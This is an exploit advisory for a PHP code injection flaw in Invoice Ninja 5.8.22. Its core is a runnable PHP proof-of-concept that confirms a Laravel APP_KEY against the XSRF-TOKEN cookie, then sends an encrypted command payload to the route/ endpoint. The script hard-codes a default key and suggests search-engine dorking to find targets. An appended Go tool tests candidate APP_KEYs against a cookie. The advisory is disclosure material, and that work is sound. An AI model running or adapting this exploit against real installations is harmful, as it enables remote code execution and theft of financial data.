Invoice Ninja 5.8.22 PHP Code Injection

Invoice Ninja version 5.8.22 contained a critical PHP Code Injection vulnerability. This flaw allowed an attacker to execute arbitrary PHP code on the server. The PoC below does not log in to the application; what it needs is the application's Laravel APP_KEY.

The vulnerability stemmed from insufficient validation of user-controlled input. The PoC below targets the route/ endpoint with a payload encrypted under the application's Laravel APP_KEY, so the attack reduces to knowing that key: a default or leaked APP_KEY lets an attacker produce values the application cannot distinguish from its own.

Successful exploitation could lead to full compromise of the Invoice Ninja application: unauthorized access to sensitive financial data, database manipulation, and potentially control of the underlying server.

Users were advised to update to a patched version; the fix addressed the inadequate input handling. Because the PoC relies only on the APP_KEY, operators should also confirm that the key is unique to their installation and rotate it if it may have been exposed, since a known key is what lets an attacker forge the encrypted value the PoC sends.

=============================================================================================================================================
| # Title : Invoice Ninja v 5.8.22 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://invoiceninja.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] Code Description: the script exploits the vulnerability through the Laravel APP_KEY. It fetches the login page, checks the supplied key by decrypting the XSRF-TOKEN cookie the application sets, and then sends a payload encrypted under that key to the route/ endpoint.

(Related : https://packetstorm.news/files/id/189419/ Related CVE numbers: CVE-2024-55555) .

[+] save code as poc.php.

[+] Set the target URL and APP_KEY in the configuration block at the end of the script.

[+] Usage = php poc.php

[+] PayLoad :

<?php

// Exploit driver: confirm the APP_KEY against the target's XSRF-TOKEN cookie,
// then send the encrypted payload to the route/ endpoint.
function execute_command($url, $command, $app_key) {
    $cipher_mode = 'AES-256-CBC';

    // Fetch the login page: Laravel sets an APP_KEY-encrypted XSRF-TOKEN cookie on the response.
    $response = send_request($url, 'GET', 'application/x-www-form-urlencoded', 'login');

    if ($response['code'] != 200) {
        die("Could not reach the target login page (HTTP " . $response['code'] . ").\n");
    }

    // Verify the APP_KEY: only the right key authenticates and decrypts the cookie.
    $xsrf_token = extract_xsrf_token($response['cookies']);
    if (!$xsrf_token) {
        die("No XSRF-TOKEN cookie in the response.\n");
    }

    $decrypted_value = laravel_decrypt($xsrf_token, $app_key, $cipher_mode);
    if (!$decrypted_value) {
        die("XSRF-TOKEN did not decrypt: the APP_KEY is wrong for this target.\n");
    }

    echo "APP_KEY in use: " . $app_key . "\n";
    echo "Decrypted XSRF-TOKEN: " . $decrypted_value . "\n";

    // Build the payload: the command is base64-encoded, then encrypted the way Laravel would.
    $payload = base64_encode($command);
    $encrypted_payload = laravel_encrypt($payload, $app_key, $cipher_mode);

    if (!$encrypted_payload) {
        die("Laravel encryption of the payload failed.\n");
    }

    // Deliver the payload to route/{hash}.
    $result = send_request($url, 'GET', 'application/x-www-form-urlencoded', "route/$encrypted_payload");
    echo "route/ responded with HTTP " . $result['code'] . "\n";
}

// HTTP helper built on curl.
function send_request($url, $method, $content_type, $endpoint) {
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, rtrim($url, '/') . '/' . $endpoint);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Content-Type: ' . $content_type
    ]);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
    // Enable curl's cookie engine; without it CURLINFO_COOKIELIST is always empty.
    curl_setopt($ch, CURLOPT_COOKIEFILE, '');

    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $cookies = curl_getinfo($ch, CURLINFO_COOKIELIST);

    curl_close($ch);

    return ['code' => $http_code, 'cookies' => $cookies, 'response' => $response];
}

// Pull the XSRF-TOKEN value out of curl's cookie list. Each entry is a Netscape-format
// line of seven tab-separated fields; the name is the sixth and the value the seventh.
function extract_xsrf_token($cookies) {
    foreach ($cookies as $cookie) {
        $fields = explode("\t", $cookie);
        if (count($fields) >= 7 && $fields[5] === 'XSRF-TOKEN') {
            // Laravel percent-encodes cookie values, so undo that before base64-decoding.
            return rawurldecode($fields[6]);
        }
    }
    return null;
}

// Turn a "base64:..." APP_KEY into the raw 32-byte AES key.
function app_key_bytes($key) {
    if (strpos($key, 'base64:') === 0) {
        $key = substr($key, 7);
    }
    return base64_decode($key);
}

// Mirror Illuminate\Encryption\Encrypter::decrypt() with serialize=false. A Laravel token
// is base64(JSON{iv, value, mac}): check the HMAC-SHA256 over iv.value with the key
// (a wrong key fails here), then AES-256-CBC-decrypt value with iv.
function laravel_decrypt($ciphertext, $key, $cipher_mode) {
    $key = app_key_bytes($key);
    $payload = json_decode(base64_decode($ciphertext), true);
    if (!is_array($payload) || !isset($payload['iv'], $payload['value'], $payload['mac'])) {
        return false;
    }
    $mac = hash_hmac('sha256', $payload['iv'] . $payload['value'], $key);
    if (!hash_equals($mac, $payload['mac'])) {
        return false;
    }
    return openssl_decrypt($payload['value'], $cipher_mode, $key, 0, base64_decode($payload['iv']));
}

// Mirror Encrypter::encrypt() with serialize=false: random IV, AES-256-CBC, HMAC, JSON, base64.
function laravel_encrypt($plaintext, $key, $cipher_mode) {
    $key = app_key_bytes($key);
    $iv = random_bytes(openssl_cipher_iv_length($cipher_mode));
    $value = openssl_encrypt($plaintext, $cipher_mode, $key, 0, $iv);
    if ($value === false) {
        return false;
    }
    $iv = base64_encode($iv);
    $mac = hash_hmac('sha256', $iv . $value, $key);
    $json = json_encode(['iv' => $iv, 'value' => $value, 'mac' => $mac, 'tag' => ''], JSON_UNESCAPED_SLASHES);
    return base64_encode($json);
}

// Target configuration: set the base URL and the application's APP_KEY here.
$url = "https://target.com";
$app_key = "base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=";
$command = "ls -la"; // command carried in the payload
execute_command($url, $command, $app_key);

?>
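The APP_KEY check the PoC performs against the XSRF-TOKEN cookie, generalised into an offline audit tool, as an added example that is not part of the original advisory or of Invoice Ninja: given a cookie value and a list of candidate keys, it reports which key, if any, authenticates the cookie. It assumes Laravel's Encrypter format for AES-256-CBC, that is base64 of a JSON object holding a base64 iv, a base64 value and a hex HMAC-SHA256 over the two base64 strings keyed with the raw APP_KEY; the cookie it checks is constructed locally with the key the PoC hard-codes rather than captured from a server. ParseAppKey, KeyMatches, LaravelEncrypt and FindKey are names chosen here.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"strings"
)

// envelope is Laravel's AES-256-CBC container (assumed format): base64 IV, base64
// ciphertext and a hex HMAC-SHA256 over those two strings, JSON-encoded then base64'd.
type envelope struct {
	IV    string `json:"iv"`
	Value string `json:"value"`
	MAC   string `json:"mac"`
	Tag   string `json:"tag"`
}

// ParseAppKey strips the "base64:" prefix of an APP_KEY and returns the 32-byte AES key.
func ParseAppKey(appKey string) ([]byte, error) {
	key, err := base64.StdEncoding.DecodeString(strings.TrimPrefix(appKey, "base64:"))
	if err == nil && len(key) != 32 {
		err = fmt.Errorf("AES-256-CBC needs a 32-byte key, got %d bytes", len(key))
	}
	return key, err
}

// laravelMAC reproduces Encrypter::hash(): HMAC-SHA256(key, base64(iv) . base64(ciphertext)).
func laravelMAC(key []byte, ivB64, ctB64 string) string {
	m := hmac.New(sha256.New, key)
	m.Write([]byte(ivB64 + ctB64))
	return hex.EncodeToString(m.Sum(nil))
}

// KeyMatches reports whether key authenticates token. Only the MAC is compared, so a
// candidate APP_KEY can be tested against a live XSRF-TOKEN cookie without decrypting it.
func KeyMatches(key []byte, token string) bool {
	raw, err := base64.StdEncoding.DecodeString(token)
	if err != nil {
		return false
	}
	var e envelope
	if json.Unmarshal(raw, &e) != nil || e.IV == "" || e.Value == "" || e.MAC == "" {
		return false
	}
	return hmac.Equal([]byte(laravelMAC(key, e.IV, e.Value)), []byte(e.MAC))
}

// LaravelEncrypt mirrors Encrypter::encrypt($plaintext, false): random IV, AES-256-CBC with
// PKCS#7 padding, then the MAC, JSON and base64 wrapping that KeyMatches expects.
func LaravelEncrypt(key, plaintext []byte) (string, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return "", err
	}
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	ct := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, ct) // encrypt in place
	e := envelope{IV: base64.StdEncoding.EncodeToString(iv), Value: base64.StdEncoding.EncodeToString(ct)}
	e.MAC = laravelMAC(key, e.IV, e.Value)
	js, err := json.Marshal(e)
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(js), nil
}

// FindKey returns the first candidate APP_KEY that authenticates cookie, or "" if none does.
func FindKey(cookie string, candidates []string) string {
	for _, appKey := range candidates {
		if key, err := ParseAppKey(appKey); err == nil && KeyMatches(key, cookie) {
			return appKey
		}
	}
	return ""
}

func main() {
	// Constructed sample, not a capture: a cookie built locally with the key the PoC hard-codes.
	const pocKey = "base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno="
	key, _ := ParseAppKey(pocKey)
	cookie, _ := LaravelEncrypt(key, []byte("example-csrf-token"))
	candidates := []string{"base64:QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=", pocKey}
	fmt.Println("key in use:", FindKey(cookie, candidates))
}
```

Because the MAC is a keyed HMAC over the ciphertext, a match is enough to prove which key produced the cookie; nothing is decrypted and no request beyond fetching one page is needed, which makes this a low-impact way to audit an installation for a default or leaked APP_KEY. A value taken from a real Set-Cookie header is percent-encoded (%3D for =, %2B for +) and must be decoded before it is passed in. The output of LaravelEncrypt is the same shape the PoC places after route/.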




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸